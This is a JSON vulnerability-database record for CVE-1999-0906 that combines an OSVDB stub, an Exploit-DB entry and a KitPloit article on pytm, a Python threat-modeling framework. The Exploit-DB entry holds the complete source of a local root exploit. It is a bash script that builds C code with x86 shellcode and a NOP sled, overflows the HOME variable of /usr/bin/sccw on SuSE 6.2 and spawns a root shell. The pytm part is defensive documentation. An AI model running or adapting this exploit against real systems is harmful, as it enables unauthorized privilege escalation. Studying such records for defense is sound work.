{"osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-0906"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.linuxsecurity.com/content/view/101962/112/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1999-q3/1030.html\nISS X-Force ID: 4114\n[CVE-1999-0906](https://vulners.com/cve/CVE-1999-0906)\nBugtraq ID: 656\n", "modified": "1999-09-23T00:00:00", "published": "1999-09-23T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1081", "id": "OSVDB:1081", "title": "sscw HOME Environment Variable Local Overflow", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:01:29", "description": "S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability. CVE-1999-0906. Local exploit for linux platform", "published": "1999-09-23T00:00:00", "type": "exploitdb", "title": "S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0906"], "modified": "1999-09-23T00:00:00", "id": "EDB-ID:19508", "href": "https://www.exploit-db.com/exploits/19508/", "sourceData": "source: http://www.securityfocus.com/bid/656/info\r\n\r\nA buffer overflow vulnerability in sscw's handling of the HOME environment variable allows local users to gain root privileges. 
\r\n\r\n#!/bin/bash\r\n#\r\n# Linux x86 exploit for /usr/bin/sccw on SuSE 6.2\r\n#\r\n# -Brock Tellier btellier@webley.com\r\n\r\necho \"Building /tmp/sccwx.c...\"\r\ncat > /tmp/sccwx.c << FOEFOE\r\n/*\r\n * sccw local root Linux x86 tested on SuSE 6.2\r\n * gcc -o sccwx sccwx.c\r\n * must compile/run a setuid(geteuid()); system(\"/bin/bash\"); for a\r\nrootshell\r\n *\r\n * -Brock Tellier btellier@webley.com\r\n */\r\n\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\nchar exec[]= /* Generic Linux x86 running our /tmp program */\r\n \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n \"\\x80\\xe8\\xdc\\xff\\xff\\xff/tmp/sc\";\r\n\r\n\r\n\r\n#define LEN 400\r\n#define NOP 0x90\r\n\r\nunsigned long get_sp(void) {\r\n\r\n__asm__(\"movl %esp, %eax\");\r\n\r\n}\r\n\r\n\r\nvoid main(int argc, char *argv[]) {\r\n\r\nint offset=0;\r\nint i;\r\nint buflen = LEN;\r\nlong int addr;\r\nchar buf[LEN];\r\n\r\n if(argc > 3) {\r\n fprintf(stderr, \"Error: Usage: %s offset buffer\\n\", argv[0]);\r\n exit(0);\r\n }\r\n else if (argc == 2){\r\n offset=atoi(argv[1]);\r\n\r\n }\r\n else if (argc == 3) {\r\n offset=atoi(argv[1]);\r\n buflen=atoi(argv[2]);\r\n\r\n }\r\n else {\r\n offset=2100;\r\n buflen=300;\r\n\r\n }\r\n\r\n\r\naddr=get_sp();\r\n\r\nfprintf(stderr, \"SuSE 6.2 sccw local root\\n\");\r\nfprintf(stderr, \"Brock Tellier btellier@webley.com\\n\");\r\nfprintf(stderr, \"Using addr: 0x%x\\n\", addr+offset);\r\n\r\nmemset(buf,NOP,buflen);\r\nmemcpy(buf+(buflen/2),exec,strlen(exec));\r\nfor(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)\r\n *(int *)&buf[i]=addr+offset;\r\n\r\nsetenv(\"HOME\", buf, 1);\r\nexecl(\"/usr/bin/sccw\", \"sccw\", NULL);\r\n\r\n}\r\nFOEFOE\r\n\r\necho \"Building /tmp/sccwuid.c...\"\r\n\r\ncat > /tmp/sccwuid.c <<EOFFOE\r\nvoid main()\r\n{\r\n setuid(geteuid());\r\n system(\"/bin/bash\");\r\n}\r\nEOFFOE\r\n\r\necho 
\"Compiling /tmp/sccwx...\"\r\ngcc -o /tmp/sccwx /tmp/sccwx.c\r\n\r\necho \"Compiling /tmp/sc...\"\r\ngcc -o /tmp/sc /tmp/sccwuid.c\r\n\r\necho \"Launching /tmp/sccwx...\"\r\n/tmp/sccwx\r\necho \"If it didn't work, try /tmp/sccwx <offset> <bufsiz>\"", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19508/"}], "kitploit": [{"lastseen": "2020-12-08T13:22:33", "bulletinFamily": "tools", "cvelist": ["CVE-1999-0906", "CVE-1999-0046"], "description": "[  ](<https://1.bp.blogspot.com/-9TGw490cd60/XjoxxI3WoyI/AAAAAAAARog/bJ9rasgVfM8p_lde8DEFBlyO3R504azcACNcBGAsYHQ/s1600/pytm_2_seq.png>)\n\n \nDefine your system in Python using the elements and properties described in the pytm framework. Based on your definition, pytm can generate a Data Flow Diagram (DFD), a Sequence Diagram and, most important of all, threats to your system. \n \n** Requirements ** \n\n\n * Linux/MacOS \n * Python 3.x \n * Graphviz package \n * Java (OpenJDK 10 or 11) \n * [ plantuml.jar ](<https://sourceforge.net/projects/plantuml/files/plantuml.jar/download> \"plantuml.jar\" )\n \n** Usage ** \n\n \n \n tm.py [-h] [--debug] [--dfd] [--report REPORT] [--exclude EXCLUDE] [--seq] [--list] [--describe DESCRIBE]\n \n optional arguments:\n -h, --help show this help message and exit\n --debug print debug messages\n --dfd output DFD (default)\n --report REPORT output report using the named template file (sample template file is under docs/template.md)\n --exclude EXCLUDE specify threat IDs to be ignored\n --seq output sequential diagram\n --list list all available threats\n --describe DESCRIBE describe the properties available for a given element\n \n\nCurrently available elements are: TM, Element, Server, ExternalEntity, Datastore, Actor, Process, SetOfProcesses, Dataflow, Boundary and Lambda. 
\nThe available properties of an element can be listed by using ` --describe ` followed by the name of an element: \n\n \n \n (pytm) \u279c pytm git:(master) \u2717 ./tm.py --describe Element\n Element\n OS\n check\n definesConnectionTimeout\n description\n dfd\n handlesResources\n implementsAuthenticationScheme\n implementsNonce\n inBoundary\n inScope\n isAdmin\n isHardened\n name\n onAWS\n \n\nFor the security practitioner, you may add new threats to the ` threatlib/threats.json ` file: \n\n \n \n {\n \"SID\":\"INP01\",\n \"target\": [\"Lambda\",\"Process\"],\n \"description\": \"Buffer Overflow via Environment Variables\",\n \"details\": \"This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.\",\n \"Likelihood Of Attack\": \"High\",\n \"severity\": \"High\",\n \"condition\": \"target.usesEnvironmentVariables is True and target.sanitizesInput is False and target.checksInputBounds is False\",\n \"prerequisites\": \"The application uses environment variables.An environment variable exposed to the user is vulnerable to a buffer overflow.The vulnerable environment variable uses untrusted data.Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer.\",\n \"mitigations\": \"Do not expose environment variable to the user.Do not use untrusted data in your environment variables. Use a language or compiler that performs automatic bounds checking. There are tools such as Sharefuzz [R.10.3] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.\",\n \"example\": \"Attack Example: Buffer Overflow in $HOME A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. Attack Example: Buffer Overflow in TERM A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable.\",\n \"references\": \"https://capec.mitre.org/data/definitions/10.html, CVE-1999-0906, CVE-1999-0046, http://cwe.mitre.org/data/definitions/120.html, http://cwe.mitre.org/data/definitions/119.html, http://cwe.mitre.org/data/definitions/680.html\"\n }\n\n** CAVEAT ** \nThe ` threats.json ` file contains strings that run through eval(), so make sure the file has correct permissions, or risk having an attacker change the strings and cause you to run code on their behalf. The logic lives in the \"condition\", where members of \"target\" can be logically evaluated. Returning true means the rule generates a finding; otherwise it is not a finding. \n\nThe following is a sample ` tm.py ` file that describes a simple application where a User logs into the application and posts comments on the app. The app server stores those comments into the database. There is an AWS Lambda that periodically cleans the Database. 
\n\n \n \n #!/usr/bin/env python3\n \n from pytm.pytm import TM, Server, Datastore, Dataflow, Boundary, Actor, Lambda\n \n tm = TM(\"my test tm\")\n tm.description = \"another test tm\"\n \n User_Web = Boundary(\"User/Web\")\n Web_DB = Boundary(\"Web/DB\")\n \n user = Actor(\"User\")\n user.inBoundary = User_Web\n \n web = Server(\"Web Server\")\n web.OS = \"CloudOS\"\n web.isHardened = True\n \n db = Datastore(\"SQL Database (*)\")\n db.OS = \"CentOS\"\n db.isHardened = False\n db.inBoundary = Web_DB\n db.isSql = True\n db.inScope = False\n \n my_lambda = Lambda(\"cleanDBevery6hours\")\n my_lambda.hasAccessControl = True\n my_lambda.inBoundary = Web_DB\n \n my_lambda_to_db = Dataflow(my_lambda, db, \"(λ)Periodically cleans DB\")\n my_lambda_to_db.protocol = \"SQL\"\n my_lambda_to_db.dstPort = 3306\n \n user_to_web = Dataflow(user, web, \"User enters comments (*)\")\n user_to_web.protocol = \"HTTP\"\n user_to_web.dstPort = 80\n user_to_web.data = 'Comments in HTML or Markdown'\n user_to_web.order = 1\n \n web_to_user = Dataflow(web, user, \"Comments saved (*)\")\n web_to_user.protocol = \"HTTP\"\n web_to_user.data = 'Ack of saving or error message, in JSON'\n web_to_user.order = 2\n \n web_to_db = Dataflow(web, db, \"Insert query with comments\")\n web_to_db.protocol = \"MySQL\"\n web_to_db.dstPort = 3306\n web_to_db.data = 'MySQL insert statement, all literals'\n web_to_db.order = 3\n \n db_to_web = Dataflow(db, web, \"Comments contents\")\n db_to_web.protocol = \"MySQL\"\n db_to_web.data = 'Results of insert op'\n db_to_web.order = 4\n \n tm.process()\n\nDiagrams are output as [ Dot ](<https://graphviz.gitlab.io/> \"Dot\" ) and [ PlantUML ](<https://plantuml.com/> \"PlantUML\" ). \nWhen the ` --dfd ` argument is passed to the above ` tm.py ` file it generates output to stdout, which is fed to Graphviz's dot to generate the Data Flow Diagram: \n\n \n \n tm.py --dfd | dot -Tpng -o sample.png\n\nGenerates this diagram: \n\n\n[  ](<https://1.bp.blogspot.com/-Hm2ZfHPPJ50/XjoxsNzP86I/AAAAAAAARoc/SdZqJxktsJsp6ZeY9VZaLhHW4yT4QREaQCNcBGAsYHQ/s1600/pytm_1_dfd.png>)\n\n \nThe ` --seq ` argument generates a Sequence diagram. 
\n\nGenerates this diagram: \n\n\n[  ](<https://1.bp.blogspot.com/-9TGw490cd60/XjoxxI3WoyI/AAAAAAAARog/bJ9rasgVfM8p_lde8DEFBlyO3R504azcACNcBGAsYHQ/s1600/pytm_2_seq.png>)\n\n \nThe diagrams and findings can be included in the template (via ` --report `) to create a final report. \n\nThe templating format used in the report template is very simple: \n\n \n \n # Threat Model Sample\n ***\n \n ## System Description\n \n {tm.description}\n \n ## Dataflow Diagram\n \n ## Dataflows\n \n Name|From|To |Data|Protocol|Port\n ----|----|---|----|--------|----\n {dataflows:repeat:{{item.name}}|{{item.source.name}}|{{item.sink.name}}|{{item.data}}|{{item.protocol}}|{{item.dstPort}}\n }\n \n ## Findings\n \n {findings:repeat:* {{item.description}} on element \"{{item.target}}\"\n }\n\n \n** Currently supported threats ** \n\n \n \n INP01 - Buffer Overflow via Environment Variables\n INP02 - Overflow Buffers\n INP03 - Server Side Include (SSI) Injection\n CR01 - Session Sidejacking\n INP04 - HTTP Request Splitting\n CR02 - Cross Site Tracing\n INP05 - Command Line Execution through SQL Injection\n INP06 - SQL Injection through SOAP Parameter Tampering\n SC01 - JSON Hijacking (aka JavaScript Hijacking)\n LB01 - API Manipulation\n AA01 - Authentication Abuse/ByPass\n DS01 - Excavation\n DE01 - Interception\n DE02 - Double Encoding\n API01 - Exploit Test APIs\n AC01 - Privilege Abuse\n INP07 - Buffer Manipulation\n AC02 - Shared Data Manipulation\n DO01 - Flooding\n HA01 - Path Traversal\n AC03 - Subverting Environment Variable Values\n DO02 - Excessive Allocation\n DS02 - Try All Common Switches\n INP08 - Format String Injection\n INP09 - LDAP Injection\n INP10 - Parameter Injection\n INP11 - Relative Path Traversal\n INP12 - Client-side Injection-induced Buffer Overflow\n AC04 - XML Schema Poisoning\n DO03 - XML Ping of the Death\n AC05 - Content Spoofing\n INP13 - Command Delimiters\n INP14 - Input Data Manipulation\n DE03 - Sniffing Attacks\n CR03 - Dictionary-based Password Attack\n API02 - Exploit Script-Based APIs\n HA02 - White Box Reverse Engineering\n DS03 - Footprinting\n AC06 - Using Malicious Files\n HA03 - Web Application Fingerprinting\n SC02 - XSS Targeting Non-Script Elements\n AC07 - Exploiting Incorrectly Configured Access Control Security Levels\n INP15 - IMAP/SMTP Command Injection\n HA04 - Reverse Engineering\n SC03 - Embedding Scripts within Scripts\n INP16 - PHP Remote File Inclusion\n AA02 - Principal Spoof\n CR04 - Session Credential Falsification through Forging\n DO04 - XML Entity Expansion\n DS04 - XSS Targeting Error Pages\n SC04 - XSS Using Alternate Syntax\n CR05 - Encryption Brute Forcing\n AC08 - Manipulate Registry Information\n DS05 - Lifting Sensitive Data Embedded in Cache\n\n \n \n\n\n** [ Download Pytm ](<https://github.com/izar/pytm> \"Download Pytm\" ) **\n", "edition": 9, "modified": "2020-02-10T11:30:06", "published": "2020-02-10T11:30:06", "id": "KITPLOIT:7491619584321501014", "href": "http://www.kitploit.com/2020/02/pytm-pythonic-framework-for-threat.html", "title": "Pytm - A Pythonic Framework For Threat Modeling", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}